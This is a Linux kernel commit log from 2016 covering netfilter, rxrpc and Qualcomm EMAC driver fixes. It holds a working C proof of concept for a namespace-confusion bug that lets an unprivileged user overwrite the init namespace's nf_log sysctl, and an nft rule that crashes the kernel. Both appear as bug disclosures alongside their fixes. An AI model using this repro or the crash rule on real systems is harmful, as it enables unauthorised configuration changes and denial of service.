1. 04 Oct, 2016 2 commits
    • netfilter: nft_limit: fix divided by zero panic · 2fa46c13
      Liping Zhang authored
      After I added the following nftables rule, my system panicked:
        # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second
      
        divide error: 0000 [#1] SMP
        [ ... ]
        RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
        nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
        Call Trace:
        [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
        [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
        [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
        [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
        [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
        [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
        [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
        [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
        [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
        [<ffffffff81703d3c>] ip_local_out+0x1c/0x40
      
      This is because the divisor is 64-bit but is treated as a 32-bit integer,
      so 0xf00000000 is truncated to zero, i.e. the divisor becomes 0.
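
      The truncation can be reproduced in user space. The following is a
      minimal sketch, not the kernel code: truncate_rate() and safe_div_u64()
      are hypothetical helpers introduced only to show why the low 32 bits of
      0xf00000000 are zero and how keeping the divisor 64-bit avoids the trap.

```c
#include <stdint.h>

/* Hypothetical helper: models storing a 64-bit rate in a 32-bit divisor. */
uint32_t truncate_rate(uint64_t rate)
{
        return (uint32_t)rate;  /* keeps only the low 32 bits */
}

/*
 * Hypothetical helper: divide with a full 64-bit divisor and refuse a
 * zero divisor. Returns 0 on success, -1 if the division is unsafe.
 */
int safe_div_u64(uint64_t dividend, uint64_t divisor, uint64_t *out)
{
        if (divisor == 0)
                return -1;
        *out = dividend / divisor;
        return 0;
}
```

      With the rate from the rule above, truncate_rate(0xf00000000ULL) yields
      0, so any division by the truncated value would fault, whereas the
      64-bit division succeeds.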
      Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
      Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
    • netfilter: fix namespace handling in nf_log_proc_dostring · dbb5918c
      Jann Horn authored
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
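
      The idea can be modelled in user space. This is a simplified sketch
      under stated assumptions: mock_net, mock_ctl_table, mock_current_net and
      both write handlers are hypothetical stand-ins, not the kernel's types
      or functions. It only illustrates the difference between trusting the
      writer's namespace and using the namespace stashed in extra2.

```c
#include <stdio.h>

/* Mock types: simplified stand-ins, not the kernel definitions. */
struct mock_net {
        char logger[32];
};

struct mock_ctl_table {
        void *data;     /* already in use, per the commit message */
        void *extra1;   /* already in use, per the commit message */
        void *extra2;   /* stashes the namespace that owns this table */
};

/* Stand-in for "current's network namespace" at write time. */
struct mock_net *mock_current_net;

/* Buggy pattern: writes to whatever namespace the writer is in. */
void mock_write_buggy(struct mock_ctl_table *table, const char *val)
{
        (void)table;
        snprintf(mock_current_net->logger,
                 sizeof(mock_current_net->logger), "%s", val);
}

/* Fixed pattern: writes to the namespace recorded in the table. */
void mock_write_fixed(struct mock_ctl_table *table, const char *val)
{
        struct mock_net *net = table->extra2;

        snprintf(net->logger, sizeof(net->logger), "%s", val);
}
```

      In the attack scenario the table belongs to the child namespace while
      the writer runs in the init namespace, so only the buggy handler
      changes the init namespace's logger.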
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: Jann Horn <jann@thejh.net>
      Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
  2. 30 Sep, 2016 28 commits
  3. 29 Sep, 2016 10 commits
    • rxrpc: Note serial number being ACK'd in the congestion management trace · ed1e8679
      David Howells authored
      Note the serial number of the packet being ACK'd in the congestion
      management trace rather than the serial number of the ACK packet.  Whilst
      the serial number of the ACK packet is useful for matching ACK packets in
      the output of Wireshark, the serial number that the ACK is in response to
      is of more use in working out how different trace lines relate.
      Signed-off-by: David Howells <dhowells@redhat.com>
    • rxrpc: Request more ACKs in slow-start mode · b112a670
      David Howells authored
      Set the request-ACK on more DATA packets whilst we're in slow start mode so
      that we get sufficient ACKs back to supply information to configure the
      window.
      Signed-off-by: David Howells <dhowells@redhat.com>
    • rxrpc: Reduce the rxrpc_local::services list to a pointer · 1e9e5c95
      David Howells authored
      Reduce the rxrpc_local::services list to just a pointer as we don't permit
      multiple service endpoints to bind to a single transport endpoint (this is
      excluded by rxrpc_lookup_local()).
      
      The reason we don't allow this is that if you send a request to an AFS
      filesystem service, it will try to talk back to your cache manager on the
      port you sent from (this is how file change notifications are handled).  To
      prevent someone from stealing your CM callbacks, we don't let AF_RXRPC
      sockets share a UDP socket if at least one of them has a service bound.
      Signed-off-by: David Howells <dhowells@redhat.com>
    • rxrpc: When activating client conn channels, do state check inside lock · 2629c7fa
      David Howells authored
      In rxrpc_activate_channels(), the connection cache state is checked outside
      of the lock, which means it can change whilst we're waking calls up,
      thereby changing whether or not we're allowed to wake calls up.
      
      Fix this by moving the check inside the locked region.  The check to see if
      all the channels are currently busy can stay outside of the locked region.
      
      Whilst we're at it:
      
       (1) Split the locked section out into its own function so that we can call
           it from other places in a later patch.
      
       (2) Determine the mask of channels dependent on the state as we're going
           to add another state in a later patch that will restrict the number of
           simultaneous calls to 1 on a connection.
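
      The check-inside-the-lock pattern can be sketched in user space. This is
      an illustration only: mock_conn, the spinlock built on atomic_flag, and
      the mock_* functions are hypothetical and do not mirror the rxrpc
      structures. The locked section is split into its own function, as in
      point (1), and the state is read only while the lock is held.

```c
#include <stdatomic.h>

enum mock_cache_state { MOCK_CONN_WAITING, MOCK_CONN_ACTIVE };

struct mock_conn {
        atomic_flag lock;               /* stand-in for the channel lock */
        enum mock_cache_state state;    /* protected by lock */
        unsigned int woken;             /* calls woken so far, protected by lock */
};

void mock_conn_init(struct mock_conn *c, enum mock_cache_state state)
{
        atomic_flag_clear(&c->lock);
        c->state = state;
        c->woken = 0;
}

static void mock_lock(struct mock_conn *c)
{
        while (atomic_flag_test_and_set(&c->lock))
                ;       /* spin until the flag is released */
}

static void mock_unlock(struct mock_conn *c)
{
        atomic_flag_clear(&c->lock);
}

/* Locked section: the caller must hold c->lock. */
unsigned int mock_activate_locked(struct mock_conn *c, unsigned int waiting)
{
        if (c->state != MOCK_CONN_ACTIVE)       /* checked under the lock */
                return 0;
        c->woken += waiting;
        return waiting;
}

unsigned int mock_activate(struct mock_conn *c, unsigned int waiting)
{
        unsigned int n;

        mock_lock(c);
        n = mock_activate_locked(c, waiting);
        mock_unlock(c);
        return n;
}
```

      Because the state is read after the lock is taken, it cannot change
      between the check and the wake-ups.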
      Signed-off-by: David Howells <dhowells@redhat.com>
    • rxrpc: Make Tx loss-injection go through normal return and adjust tracing · a1767077
      David Howells authored
      In rxrpc_send_data_packet() make the loss-injection path return through the
      same code as the transmission path so that the RTT determination is
      initiated and any future timer shuffling will be done, despite the packet
      having been binned.
      
      Whilst we're at it:
      
       (1) Add to the tx_data tracepoint an indication of whether or not we're
           retransmitting a data packet.
      
       (2) When we're deciding whether or not to request an ACK, rather than
           checking if we're in fast-retransmit mode check instead if we're
           retransmitting.
      
       (3) Don't invoke the lose_skb tracepoint when losing a Tx packet as we're
           not altering the sk_buff refcount nor are we just seeing it after
           getting it off the Tx list.
      
       (4) The rxrpc_skb_tx_lost note is then no longer used so remove it.
      
       (5) rxrpc_lose_skb() no longer needs to deal with rxrpc_skb_tx_lost.
      Signed-off-by: David Howells <dhowells@redhat.com>
    • rxrpc: Fix exclusive client connections · 8732db67
      David Howells authored
      Exclusive connections are currently reusable (which they shouldn't be)
      because rxrpc_alloc_client_connection() checks the exclusive flag in the
      rxrpc_connection struct before it's initialised from the function
      parameters.  This means that the DONT_REUSE flag doesn't get set.
      
      Fix this by checking the function parameters for the exclusive flag.
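
      The ordering problem can be shown with a small user-space sketch. The
      mock_* types, the MOCK_CONN_DONT_REUSE bit and both allocators are
      hypothetical simplifications, not the rxrpc code. They only contrast
      reading the flag from the freshly zeroed struct with reading it from the
      function parameters.

```c
#include <stdbool.h>
#include <stdlib.h>

#define MOCK_CONN_DONT_REUSE 0x1u

struct mock_conn_params {
        bool exclusive;
};

struct mock_connection {
        struct mock_conn_params params;
        unsigned int flags;
};

/* Buggy ordering: tests conn->params before it is copied from cp. */
struct mock_connection *mock_alloc_buggy(const struct mock_conn_params *cp)
{
        struct mock_connection *conn = calloc(1, sizeof(*conn));

        if (!conn)
                return NULL;
        if (conn->params.exclusive)     /* still zeroed: never true here */
                conn->flags |= MOCK_CONN_DONT_REUSE;
        conn->params = *cp;
        return conn;
}

/* Fixed ordering: tests the function parameters directly. */
struct mock_connection *mock_alloc_fixed(const struct mock_conn_params *cp)
{
        struct mock_connection *conn = calloc(1, sizeof(*conn));

        if (!conn)
                return NULL;
        if (cp->exclusive)
                conn->flags |= MOCK_CONN_DONT_REUSE;
        conn->params = *cp;
        return conn;
}
```

      For an exclusive request, only the fixed allocator returns a connection
      with the don't-reuse bit set.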
      Signed-off-by: David Howells <dhowells@redhat.com>
    • Merge branch 'qcom-emac-acpi' · 31fbe81f
      David S. Miller authored
      Timur Tabi says:
      
      ====================
      Add basic ACPI support to the Qualcomm Technologies EMAC driver
      
      This patch series adds support to the EMAC driver for extracting addresses,
      interrupts, and some _DSDs (properties) from ACPI.  The first two patches
      clean up the code, and the third patch adds ACPI-specific functionality.
      
      The first patch fixes a bug with handling the platform_device for the
      internal PHY.  This PHY is treated as a separate device in both DT and
      ACPI, but since the platform_device is not released automatically when the
      driver unloads, managed functions like devm_ioremap_resource cannot be
      used.
      
      The second patch replaces of_get_mac_address with its platform-independent
      equivalent device_get_mac_address.
      
      The third patch parses the ACPI tables to obtain the platform_device for
      the primary EMAC node ("QCOM8070") and the internal PHY node ("QCOM8071").
      ====================
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: qcom/emac: initial ACPI support · 5f3d3807
      Timur Tabi authored
      Add support for reading addresses, interrupts, and _DSD properties
      from ACPI tables, just like with device tree.  The HID for the
      EMAC device itself is QCOM8070.  The internal PHY is represented
      by a child node with a HID of QCOM8071.
      
      The EMAC also has some complex clock initialization requirements
      that are not represented by this patch.  This will be addressed
      in a future patch.
      Signed-off-by: Timur Tabi <timur@codeaurora.org>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: qcom/emac: use device_get_mac_address · 0de709ac
      Timur Tabi authored
      Replace the DT-specific of_get_mac_address() function with
      device_get_mac_address(), which works on both DT and ACPI platforms.  This
      change makes it easier to add ACPI support.
      Signed-off-by: Timur Tabi <timur@codeaurora.org>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: qcom/emac: do not use devm on internal phy pdev · 54e19bc7
      Timur Tabi authored
      The platform_device returned by of_find_device_by_node() is not
      automatically released when the driver unprobes.  Therefore,
      managed calls like devm_ioremap_resource() should not be used.
      Instead, we manually allocate the resources and then free them
      on driver release.
      Signed-off-by: Timur Tabi <timur@codeaurora.org>
      Signed-off-by: David S. Miller <davem@davemloft.net>